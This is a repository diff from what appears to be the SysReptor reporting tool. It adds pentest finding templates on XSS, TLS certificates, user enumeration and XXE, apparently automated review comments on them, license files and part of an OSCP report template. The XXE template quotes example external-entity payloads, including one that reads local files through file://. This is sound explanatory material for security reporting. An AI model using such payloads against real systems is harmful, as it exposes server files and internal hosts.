If the attack is successful, an attacker gains control over web application functions and data in the victim's context.
If the affected user has privileged access, an attacker may be able to gain complete control over the web application.
"""
recommendation = """
* Ensure that all processed data is filtered as rigorously as possible. Filtering and validation should be done based on expected and valid inputs.
* Data should be encoded before the web application includes it in HTTP responses. Encoding should be done contextually, that is, depending on where the web application inserts data in the HTML document, the appropriate encoding syntax must be considered.
* The HTTP headers `Content-Type` (e.g. `text/plain`) and `X-Content-Type-Options: nosniff` can be set for HTTP responses that do not contain HTML and JavaScript.
* We recommend to additionally use a Content Security Policy (CSP) to control which client-side scripts are allowed and which are forbidden.
* Detailed information and help on preventing XSS can be found in the linked Cross-Site Scripting Prevention Cheat Sheet from OWASP.
"""
short_recommendation = """\
User input should be validated and filtered based on expected or valid input. \
It should be ensured that data is properly encoded contextually before it is included in HTTP responses.\
"""
references = [
"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html",
]
affected_components = []
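Review bot: The vector in `cvss` uses `UI:N` and the summary states that exploitation needs no user interaction, but the description says the script runs when a victim visits the affected page, which CVSS 3.1 scoring normally treats as required interaction. If the template should follow the usual scoring of stored XSS, `cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"` and a summary sentence such as `Stored XSS needs no crafted link; a victim only has to visit the affected page.` would be consistent with each other. The recommendation could also mention setting `HttpOnly` on session cookies, since the description names access to cookies and session tokens as the impact.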


@ -0,0 +1,87 @@
format = "templates/v2"
id = "0ebd8c6a-6386-4512-b5e5-d2d0b80f19dc"
tags = [
"infrastructure",
"external",
]
images = []
[[translations]]
id = "24604e1d-a9c0-46e0-85d3-3674e024721c"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "Untrusted TLS certificates"
cvss = "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
summary = """
Communication with the application at the transport layer level was not sufficiently protected due to untrusted TLS certificates.
TLS is used by many protocols to ensure the confidentiality and integrity of communication between two endpoints.
If web browsers do not trust an application's TLS certificate, the application may be vulnerable to man-in-the-middle attacks
and thus susceptible to eavesdropping or tampering with traffic.
Insufficient protection at the transport layer may allow communications between two parties to be compromised by an untrusted third party.
An attacker could thus obtain sensitive data (e.g., credentials) if necessary.
In the event of a successful attack, an attacker could gain complete control over all functions
and data of the application by compromising a privileged user account.
"""
description = """
Transport Layer Security (TLS) is the successor to the now obsolete as well as insecure Secure Sockets Layer (SSL) protocol.
TLS is a cryptographic protocol developed for secure, encrypted communication between two or more parties.
The protocol is used in a wide variety of areas, including e-mail, instant messaging, and voice-over-IP.
The best known use of TLS is on the Web, where it ensures secure communication over HTTPS.
Primarily, TLS aims to ensure confidentiality, integrity,
but also authenticity through the use of certificates, between two or more parties.
With TLS, the establishment of a secure connection takes place in several steps.
Client and server agree on the use of TLS in the first step.
This is done either by selecting a specific port (e.g. 443 for HTTP) or by making a protocol-specific request to the server (e.g. STARTTLS for SMTP).
A handshake procedure then begins, in which the client and server negotiate various parameters for the security of the communication link.
The handshake begins with the client and server agreeing on a respective supported cipher suite, consisting of the symmetric cipher and hash function.
The server then issues a digital certificate.
The certificate contains, among other things, the server name, the issuing certificate authority (CA), and the server's data asymmetric key.
Once the client has verified the validity of the certificate, it generates a symmetric session key for the secure connection.
This is done either by the client deriving a key from a random number.
The client encrypts the random number with the server's data key and sends the result to the server.
The server can use the private key to read the result and also derive the session key.
However, the client and server could also use the Diffie-Hellman algorithm to securely agree on a random session key.
Diffie-Hellman also offers the advantage of perfect forward secrecy (PFS).
PFS prevents subsequent decryption once the server's private key is known.
Session keys are not exchanged and thus cannot be reconstructed.
The security of TLS-secured communication is based primarily on the trustworthiness of the digital certificate.
If the trustworthiness is not given, for example because the certificate has expired,
it contains an incorrect host name or it is a self-signed certificate, no secure key exchange between two endpoints can be guaranteed from the outset.
In some circumstances, the communication between two parties could be compromised by an untrusted third party in the course of a man-in-the-middle attack.
For example, an attacker could gain access to sensitive data or inject malicious data into the encrypted data stream to compromise either the client or the server.
We reviewed the TLS certificates of the applications in scope and found untrusted certificates for the following applications:
| host | expired | expiring soon | incorrect host name | incomplete certificate chain | self-signed certificate |
|:---:|:---:|:---:|:---:|:---:|:---:|
| TODO:443 | X | - | - | - | |
"""
recommendation = """
* Acquire new certificates for services that do not have trusted TLS certificates.
* Generate sufficiently strong asymmetric keys with at least 2048 bits for certificates and protect the private key.
* Use only modern cryptographic hash algorithms such as SHA-256.'
* Make sure that the certificate contains the fully qualified name of the server. The following should also be considered when creating the certificate:
* Consider whether the "www" subdomain should also be included.
* Do not include unqualified host names in the certificate.
* Do not include IP addresses.
* Do not include internal domain names.
* Create and use wildcard certificates only when there is a real need. Do not use wildcard certificates for convenience.
* Choose an appropriate certificate authority that is trusted by all major browsers. For internal applications, an internal CA can be used. However, ensure that all users have imported the internal CA certificate and thus trust certificates issued by that CA.
* Check the TLS configuration, including certificates, at regular intervals and adjust as necessary. There are a number of online tools (such as SSLabs, sslyze, etc) that you can use to quickly perform the check.
* For more information and help on TLS certificates, see the linked Transport Layer Protection Cheat Sheet from OWASP.
"""
short_recommendation = """\
Ensure that TLS certificates used are universally valid and trusted. \
Acquire new certificates for the affected services, if necessary. \
Also, follow best practices recommendations for secure TLS server configuration.\
"""
references = [
"https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html",
]
affected_components = []
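Review bot: Two factual slips in `description` will end up in client reports: port 443 is given as the example for HTTP (`e.g. 443 for HTTP`, should be `443 for HTTPS`), and the certificate is said to contain `the server's data asymmetric key`, which presumably means the server's public key (likewise `the server's data key` in the encryption step). The key-exchange paragraph opens with `This is done either by` without finishing the alternative in that sentence, and it presents RSA key transport as the default although TLS 1.3 no longer offers it; one clarifying clause would keep the text current. In `recommendation` there is a stray apostrophe after `SHA-256.`, and the sub-bullets under the fully-qualified-name item sit at the same level as their parent, so they need indentation to render as a nested list (the page rendering may have dropped it). The table row `| TODO:443 | X | - | - | - | |` leaves its last cell empty where the others use `-`.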


@ -0,0 +1,50 @@
format = "templates/v2"
id = "96c40db6-d642-4e37-80f7-a48a095e3fc0"
tags = [
"web",
]
images = []
[[translations]]
id = "1359a02d-b683-48c6-952c-2f42d01ea3a8"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "User Enumeration"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
summary = """
The web application was vulnerable to a user enumeration vulnerability.
User enumeration is a common vulnerability in web applications that occurs when an attacker can use brute force techniques to determine valid user accounts in a system.
Although user enumeration is a low risk in itself, it still provides an attacker with valuable information for follow-up attacks such as in brute force and credential stuffing attacks or in social engineering campaigns.
"""
description = """
We were able to identify a user enumeration vulnerability in the web application, allowing us to determine valid user accounts using brute force techniques.
**TODO: technical description**
Often, as a result of a faulty configuration or design decision, web applications indicate when a user already exists in the system.
Two of the most common areas where this occurs are the login page or the "forgot password" feature of a web application.
One example is when a user enters incorrect credentials, they receive information that the password they entered was incorrect.
The information obtained can now be used by an attacker to determine whether or not a particular username already exists.
By trial and error, an attacker can use it to determine a list of valid usernames.
Once an attacker has such a list, they can address these user accounts in new attacks to obtain valid credentials.
In its simplest form, an attacker could perform a brute force attack.
In this, an attacker tries to guess a user account's credentials by automatically trying through passwords.
Often very large word lists containing frequently used passwords are used for this purpose.
An attacker could also use determined usernames to search past data leaks for passwords.
Credentials from data leaks, consisting of pairs of usernames and passwords, can be reused by an attacker in an automated attack.
This particular form of brute force attack, is also known as credential stuffing.
Alternatively, an attacker can use usernames in the course of social engineering campaigns to contact users directly.
"""
recommendation = """
* Ensure that the web application always returns generic error messages when invalid usernames, passwords, or other credentials are entered. Identifies all relevant attack surfaces of the application for this purpose.
* If the application defines usernames itself, user enumeration can be effectively prevented. The prerequisite for this is that user names are randomly generated so that they cannot be guessed.
* The application can also use email addresses as usernames. If the username is not yet registered, an email message will contain a unique URL that can be used to complete the registration process. If the username exists, the user receives an email message with a URL to reset the password. In either case, an attacker cannot infer valid user accounts.
* As an additional security measure, you could delete default system accounts as well as test accounts or rename them before releasing the system to production.
"""
short_recommendation = "Identify all application attack surfaces relevant to User Enumeration and ensures that the web application always returns generic error messages when invalid credentials are entered."
references = []
affected_components = []
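Review bot: The recommendation addresses only the wording of error messages, but existing and non-existing accounts can still be told apart by status code, response length, redirects or response time, so the first bullet should ask for responses that are indistinguishable in those respects too, e.g. `* Make sure responses for existing and non-existing accounts do not differ in status code, content or timing.`. Because the description names brute force and credential stuffing as the follow-up attacks, a bullet on rate limiting or temporary lockout for login and password-reset requests would round it off. Two verbs are in the wrong form: `Identifies all relevant attack surfaces` should be `Identify all relevant attack surfaces`, and `ensures` in `short_recommendation` should be `ensure`.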


@ -0,0 +1,70 @@
format = "templates/v2"
id = "a955ef8b-b04f-4c7d-b1cc-60194bc34fe4"
tags = [
"web",
]
images = []
[[translations]]
id = "456e2ed1-c943-4721-8a78-d5a85f6b7e23"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "XML External Entity Injection (XXE)"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
summary = """
The web application processed XML documents in an insecure manner, which made it vulnerable to XML External Entity (XXE) Injection attacks.
XXE Injection is a vulnerability in web applications that allows an attacker to interfere with the processing of XML documents by an XML parser.
This attack can lead to disclosure of confidential data, denial of service, server-side request forgery, and other severe impact on the underlying system or other backend systems.
"""
description = """
We identified an XXE injection vulnerability in the web application.
The XML parser allowed the definition of XXEs, which could create a malicious XML document.
The XXE contained a URL that referenced an external domain.
After the XXE was dereferenced by the parser, the web application interacted with this domain, which is evident from the DNS requests.
**TODO: technical description**
Extensible Markup Language (XML) is a standardized markup language and file format for storing, transmitting, and reconstructing arbitrary data.
The language encodes data in a format that is readable by both humans and machines.
The structure of an XML document is defined in the XML standard.
The standard provides for a concept called an entity.
Entities provide the ability to reference content that is provided remotely by a server or resides locally on the server.
When the XML parser evaluates the XML document, the entity it contains is replaced with the referenced value.
Entities are defined in so-called Document Type Definitions (DTDs).
DTDs define the structure and composition of an XML document.
They can either be completely contained in the XML document itself, so-called internal DTDs, or they can be loaded from another location, so-called external DTDs.
A combination of both variants is also possible.
XML External Entities (XXE) are a special form of XML entities whose contents are loaded from outside the DTD in which they are declared.
An XXE is declared in the DTD with the SYSTEM keyword and a URI from where the content should be loaded.
For example:
`<!DOCTYPE dtd [ <!ENTITY xxe SYSTEM "http://syslifters.com" > ]>`
The URI can also use the `file://` protocol scheme.
Content can be loaded from local files as a result.
For example:
`<!DOCTYPE dtd [ <!ENTITY xxe SYSTEM "file:///path/to/local/file" > ]>`
When evaluating XML documents, the XML parser replaces occurring XXEs with the contents by dereferencing the defined URIs.
If the URI contains manipulated data, this could have serious consequences.
An attacker can exploit this to perform server-side request forgery (SSRF) attacks and compromise the underlying server or other backend infrastructure.
XXE injection vulnerabilities can also be exploited to cause service/application downtime (denial of service) or expose sensitive data such as local system files.
"""
recommendation = """
* The XML parser should be configured to use a local static DTD and not allow external DTDs declared in the XML document.
* We recommend limiting the functions of the XML parsing library to the minimum needed (see the documentation of the library used).
* User input should be validated before parsing if possible.
* Detailed information and help on preventing XXE injections can be found in the linked XML External Entity Prevention Cheat Sheet from OWASP.
"""
short_recommendation = "Disable support for external DTDs in the XML parsing library."
references = [
"https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html",
]
affected_components = []
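Review bot: `short_recommendation` and the first recommendation bullet only ask to disable external DTDs, but both examples in the description declare the external entity inside an internal DTD subset (`<!DOCTYPE dtd [ <!ENTITY xxe SYSTEM … > ]>`), which that setting alone would not necessarily stop. I would word it as `short_recommendation = "Disable DTD processing in the XML parser or, where DTDs are required, disable the resolution of external entities."` and mirror that in the first bullet. The vector `C:N/I:N/A:H` scores availability only, while the summary leads with data disclosure and SSRF; if that is a deliberate default it deserves a TODO hint next to the technical description, otherwise the confidentiality metric looks understated. The phrase `which could create a malicious XML document` in the description is garbled; presumably it means that an attacker could supply such a document.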


@ -0,0 +1,105 @@
This file contains licenses of components used in the HTML/Vue template source code of designs.
vue
MIT
The MIT License (MIT)
Copyright (c) 2018-present, Yuxi (Evan) You
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
chart.js
MIT
The MIT License (MIT)
Copyright (c) 2014-2022 Chart.js Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
chartjs-plugin-datalabels
MIT
The MIT License (MIT)
Copyright (c) 2017-2021 chartjs-plugin-datalabels contributors
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
lodash
MIT
The MIT License
Copyright JS Foundation and other contributors <https://js.foundation/>
Based on Underscore.js, copyright Jeremy Ashkenas,
DocumentCloud and Investigative Reporters & Editors <http://underscorejs.org/>
This software consists of voluntary contributions made by many
individuals. For exact contribution history, see the revision history
available at https://github.com/lodash/lodash
The following license applies to all parts of this software except as
documented below:
====
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
====
Copyright and related rights for sample code are waived via CC0. Sample
code is defined as all source code displayed within the prose of the
documentation.
CC0: http://creativecommons.org/publicdomain/zero/1.0/
====
Files located in the node_modules and vendor directories are externally
maintained libraries used by this software which have their own
licenses; we recommend you read them, as their terms may differ from the
terms above.


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

Binary file not shown.


File diff suppressed because it is too large Load Diff


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

Binary file not shown.

After

Width:  |  Height:  |  Size: 5.5 KiB

File diff suppressed because it is too large Load Diff


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

Binary file not shown.

After

Width:  |  Height:  |  Size: 5.5 KiB

File diff suppressed because it is too large Load Diff


@ -0,0 +1,106 @@
This file contains licenses of components used in the HTML/Vue template source code of designs.
vue
MIT
The MIT License (MIT)
Copyright (c) 2018-present, Yuxi (Evan) You
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
chart.js
MIT
The MIT License (MIT)
Copyright (c) 2014-2022 Chart.js Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
chartjs-plugin-datalabels
MIT
The MIT License (MIT)
Copyright (c) 2017-2021 chartjs-plugin-datalabels contributors
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
lodash
MIT
The MIT License
Copyright JS Foundation and other contributors <https://js.foundation/>
Based on Underscore.js, copyright Jeremy Ashkenas,
DocumentCloud and Investigative Reporters & Editors <http://underscorejs.org/>
This software consists of voluntary contributions made by many
individuals. For exact contribution history, see the revision history
available at https://github.com/lodash/lodash
The following license applies to all parts of this software except as
documented below:
====
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
====
Copyright and related rights for sample code are waived via CC0. Sample
code is defined as all source code displayed within the prose of the
documentation.
CC0: http://creativecommons.org/publicdomain/zero/1.0/
====
Files located in the node_modules and vendor directories are externally
maintained libraries used by this software which have their own
licenses; we recommend you read them, as their terms may differ from the
terms above.


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


@ -0,0 +1,792 @@
format = "projecttypes/v1"
id = "137ea3ee-ff86-4d8c-a6ff-56f60870979f"
name = "OSCP Lab Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"ip_address",
"cvss",
"initialaccess",
"privilegeescalation",
"postexploitation",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<section>
<h1 class="in-toc numbered">Offensive Security OSCP Lab Penetration Test Report</h1>
<div v-if="report.objective">
<h2 id="summary" class="in-toc numbered">Objective</h2>
<markdown :text="report.objective" />
</div>
<div v-if="report.lab_network">
<h2 id="lab-network" class="in-toc numbered">Lab Network</h2>
<markdown :text="report.lab_network" />
</div>
<div>
<h2 id="finding-summary" class="in-toc numbered">Identified Vulnerabilities</h2>
<p>
In the course of this penetration test
<comma-and-join>
<template #critical v-if="finding_stats.count_critical > 0"><strong class="risk-critical">{{ finding_stats.count_critical }} Critical</strong></template>
<template #high v-if="finding_stats.count_high > 0"><strong class="risk-high">{{ finding_stats.count_high }} High</strong></template>
<template #medium v-if="finding_stats.count_medium > 0"><strong class="risk-medium">{{ finding_stats.count_medium }} Medium</strong></template>
<template #low v-if="finding_stats.count_low > 0"><strong class="risk-low">{{ finding_stats.count_low }} Low</strong></template>
<template #info v-if="finding_stats.count_info > 0"><strong class="risk-info">{{ finding_stats.count_info }} Info</strong></template>
</comma-and-join>
vulnerabilities were identified:
</p>
<table>
<thead>
<tr>
<th>Target Name</th>
<th>IP</th>
<th align="center">CVSS</th>
<th align="center">Page</th>
</tr>
</thead>
<tbody>
<tr v-for="finding in findings" class="table-row-link">
<td>
<ref :to="finding.id">{{ finding.title }}</ref>
</td>
<td>
<ref :to="finding.id">{{ finding.ip_address }}</ref>
</td>
